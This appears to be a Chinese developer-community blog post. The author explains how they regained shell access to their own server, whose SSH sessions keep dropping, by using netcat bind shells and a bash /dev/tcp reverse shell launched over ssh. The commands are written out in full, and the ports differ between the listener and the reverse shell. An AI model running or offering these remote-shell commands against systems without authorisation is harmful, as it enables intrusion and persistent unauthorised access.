前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >反弹shell的意外解锁方式

反弹shell的意外解锁方式

原创
作者头像
ge3m0r
发布2024-11-29 13:01:32
发布2024-11-29 13:01:32
1310
举报

最近遇到一个问题,服务的 ssh 连接没多久就断开了,之前其他人操作过,也不知道具体操作的什么,服务器其他端口也没有开,排查问题也没办法排查。

根据评估当然所有人的第一反应都是重装系统,但是出于某种直觉,我觉得还有操作空间。

后来我仔细分析了一下,哎呦,这题我会呀!这不就是反弹 shell 吗!ssh 服务不能用了,我开个其他服务不就行了。

反弹shell

反弹shell 很简单,就是两个服务器之间,其中一端开一个服务,另一端连接上去,有正向连接,反向连接,正向连接就是你那边开一个服务端口,我直接连接上去。反向连接,就是我这边监听一个端口,你通过连接把shell 给我。

那现在情况很简单,ssh 连接只能连接一段时间,那我再这个期间监听一个端口,或者说我连接一个端口就行了。

ssh

ssh 是用于连接服务器的一个服务,其也可以支持命令执行。

代码语言:shell
复制
ssh -p port user@host "command"

如果想要交互需要开启一个tty

代码语言:shell
复制
ssh -t -p port user@host "command"

回到反弹shell , 我们可以这样实现

正向连接

代码语言:shell
复制
ssh -t -p port user@host "nohup nc -lvvp 8889 -e /bin/bash > /dev/null 2>&1 &"

在另一个客户端执行

代码语言:shell
复制
nc host 8889

就可以连接一个shell

反向连接

这次我们在我们没有问题的机器上执行

代码语言:shell
复制
nc -lvvp 8889

反向连接

代码语言:shell
复制
ssh -t -p port user@host "nohup bash -i >& /dev/tcp/127.0.0.1/8080 0>&1 &"

至此我们就可以绕过ssh 进行连接。当然反弹没有必须需要用 nc ,也可以使用 python 等,这里不再赘述。

这本来是渗透测试基本,没想到这里解锁了另外的使用方式。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 反弹shell
  • ssh
    • 正向连接
      • 反向连接
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档